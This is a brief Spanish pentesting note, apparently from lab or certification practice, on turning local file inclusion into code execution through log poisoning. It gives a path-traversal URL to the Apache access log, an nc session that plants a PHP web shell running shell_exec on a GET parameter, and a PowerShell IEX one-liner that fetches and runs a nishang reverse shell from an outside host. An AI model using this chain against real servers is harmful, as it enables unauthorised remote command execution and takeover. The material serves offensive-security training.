Algunas veces y por diferentes motivos puedes acceder a los logs.
Un ejemplo muy típico son los access logs via LFI. http://IP/xyz.php?page=../../../../../%20../../xampp/apache/logs/access.log%00

Puedes infectar los access logs muy fácil con nc

root@kali:~# nc -nv 10.10.10.10 80 
(UNKNOWN) [10.11.1.35] 80 (http) open

<?php echo shell_exec($_GET['ric']);?>

HTTP/1.1 400 Bad Request

Con eso, si accedes al log con ric=command se ejecuta. Por ejemplo para ejecutar ipconfig.

http://IP/xyz.php?ric=ipconfig&page=../../../../../%20../../xampp/apache/logs/access.log%00

A partir de ahí podemos probar si tenemos powershell.

Con eso podemos bajar la reverse shell de nishang y listo 🙂

powershell.exe IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.9:8000/powershellreverse2.ps1’)